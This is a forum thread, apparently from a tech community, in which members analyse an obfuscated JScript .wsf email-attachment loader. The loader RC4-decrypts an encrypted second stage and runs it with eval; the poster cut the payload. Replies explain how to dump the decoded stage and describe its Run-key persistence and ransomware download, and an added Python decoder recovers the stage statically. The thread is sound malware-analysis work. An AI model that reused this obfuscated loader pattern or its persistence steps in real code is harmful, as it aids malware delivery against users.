Programmers: What does this code do?

Conficker

Well-Known Member
Joined
Mar 31, 2009
Messages
116
Hey everyone. One of my clients received this code via email and of course he opened the link. My question: what did it do?
No doubt it's malware, but can I clean up whatever mess it made?


<job>

<script language="JScript">

// RC4 under randomised names: v4af4 is the key string, v6b46 the ciphertext.
// The (x * 2) / 2 expressions are no-ops wrapped around an ordinary swap,
// present only to break simple signature matching.
function v9e8d(v4af4, v6b46) {
var vb44b = [], vcb87 = 0, vadb6, vd293 = '';
// key scheduling: initialise the 256-entry state array
for (var vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vb44b[vc4d9] = vc4d9;
}
// key scheduling: permute the state using the key's character codes
for (vc4d9 = 0; vc4d9 < 256; vc4d9++) {
vcb87 = (vcb87 + vb44b[vc4d9] + v4af4.charCodeAt(vc4d9 % v4af4.length)) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
}
vc4d9 = 0;
vcb87 = 0;
// keystream generation: XOR one keystream byte into each input character
for (var v5e24 = 0; v5e24 < v6b46.length; v5e24++) {
vc4d9 = (vc4d9 + 1) % 256;
vcb87 = (vcb87 + vb44b[vc4d9]) % 256;
vadb6 = (vb44b[vc4d9] * 2) / 2;
vb44b[vc4d9] = (vb44b[vcb87] * 2) / 2;
vb44b[vcb87] = (vadb6 * 2) / 2;
vd293 += String.fromCharCode(v6b46.charCodeAt(v5e24) ^ vb44b[(vb44b[vc4d9] + vb44b[vcb87]) % 256]);
}
return vd293;
}

/*****************/

// 32-hex-character RC4 key
var v4af4 = "a3fa2f7a1bcf12560ecc5df80cef0345";

/*****************/

// encrypted second stage as '|'-separated decimal character codes (redacted by the poster)
var v6007 = "****cut, too long for forum post****";

v6007 = v6007.split("|");

var v0d1f = "";

// rebuild the ciphertext string from the numeric codes
for (var vc4d9 = 0; vc4d9 < v6007.length; vc4d9++)
{
v0d1f = v0d1f + String.fromCharCode(v6007[vc4d9]);
}

// decrypt with the key above...
v0d1f = v9e8d(v4af4, v0d1f);

// ...and execute the recovered script
eval(v0d1f);

</script>

</job>
 

Sinbad

Honorary Master
Joined
Jun 5, 2006
Messages
81,151
maybe change the eval to a document.write() and see?
 

SmartKit

SmartKit Rep
Joined
Jun 29, 2008
Messages
8,218
The evaluation executes Javascript code. Hopefully it was sandboxed and didn't do any damage.
 

stricken

Expert Member
Joined
Sep 5, 2010
Messages
2,265
var v6007 is the exploit payload... although it has been redacted.... my money is on a remote privilege escalation exploit.

Did he open it in IE?
 

me_

Senior Member
Joined
Oct 11, 2013
Messages
830
I've seen this - we had it already. I changed the eval to a write - it includes another obfuscated JScript script which:
- The script copies itself to the PC - it creates a wsf script locally (usually under Appdata\Roaming)
- If the user is not an admin, it writes a registry key to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Can't recall where it writes to if the user is an admin - most likely HKEY_LOCAL_MACHINE\...
This means the script is executed every time the PC is restarted.
- The script then polls a URL for malware to download (usually 0 day cryptoware distributions) and then executes the malware

FYI - JScript write - Replace eval(v0d1f) with:
var fso, f;
var ForReading = 1, ForWriting = 2;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile("c:\\output.txt", ForWriting, true); // create or overwrite the dump file
f.Write(v0d1f);
f.Close();

The variant we had wrote to %APPDATA%\Microsoft\Crypto
It created a new file name with a wsf extension
It added itself into the users Run location in the registry so it would execute every time the user logged on.
2 days later, it downloaded cryptoware and started encrypting all the files on all network shares the user had access to, but luckily it kept a log file in the above directory as well so we were able to quickly restore everything.
 
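A way to recover the second stage statically, without running the .wsf at all, as an added Python example that is not code from the thread: it mirrors the loader's three steps (split on '|', map the decimal codes to characters, RC4-decrypt with the 32-character key) and pulls the key and blob out of the source by shape rather than by the randomised variable names. The key is the one in the posted sample; the encoded payload was cut from the post, so a harmless constructed stand-in is encrypted and decoded in its place.

```python
import re

# Key copied from the posted sample; the encoded blob was cut from the post,
# so a constructed stand-in is built further down.
SAMPLE_KEY = "a3fa2f7a1bcf12560ecc5df80cef0345"

def rc4_xor(key: str, codes: list[int]) -> list[int]:
    """RC4 as the loader's v9e8d() implements it: key bytes are charCodeAt()
    of the key string, each input code unit is XORed with one keystream byte.
    The (x * 2) / 2 noise in the sample is just this swap, written oddly."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + ord(key[i % len(key)])) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = [], 0, 0
    for c in codes:                            # keystream generation
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) % 256])
    return out

def decode_stage2(key: str, pipe_blob: str) -> str:
    """The loader's split('|') / fromCharCode / v9e8d() steps, minus eval()."""
    codes = [int(x) for x in pipe_blob.split("|")]
    return "".join(map(chr, rc4_xor(key, codes)))

def encode_stage2(key: str, script: str) -> str:
    """Inverse of decode_stage2 (RC4 is symmetric); used only for the demo."""
    return "|".join(str(c) for c in rc4_xor(key, [ord(ch) for ch in script]))

def extract_from_wsf(wsf_text: str) -> tuple[str, str]:
    """Find the 32-hex-digit key and the pipe-delimited blob in .wsf source,
    independent of the randomised variable names."""
    key = re.search(r'= "([0-9a-f]{32})";', wsf_text).group(1)
    blob = re.search(r'= "(\d+(?:\|\d+)+)";', wsf_text).group(1)
    return key, blob

# Constructed stand-in for the cut payload: a harmless one-liner that gets
# decoded and shown, never executed.
STAGE2 = 'WScript.Echo("second stage");'
SAMPLE_WSF = ('<job><script language="JScript">\n'
              f'var v4af4 = "{SAMPLE_KEY}";\n'
              f'var v6007 = "{encode_stage2(SAMPLE_KEY, STAGE2)}";\n'
              'eval(v0d1f);\n</script></job>\n')

if __name__ == "__main__":
    key, blob = extract_from_wsf(SAMPLE_WSF)
    print(decode_stage2(key, blob))          # WScript.Echo("second stage");
```

Point extract_from_wsf at the real .wsf text and the decoded output is the second-stage script me_ describes, ready to read for its drop path, Run key and download URL without ever having executed it.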

halfmoonforever

Expert Member
Joined
Feb 1, 2016
Messages
1,196
I've seen this - we had it already. I changed the eval to a write - it includes another obfuscated JScript script which:
- If the user is not an admin, it writes a registry key to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Can't recall where it writes to if the user is an admin - most likely HKEY_LOCAL_MACHINE\...
This means the script is executed every time the PC is restarted.
- The script then polls a URL for malware to download (usually 0 day cryptoware distributions) and then executes the malware

FYI - JScript write - Replace eval(v0d1f) with:

ActiveXObject? That stuff still works? What is this? 2002? :D
 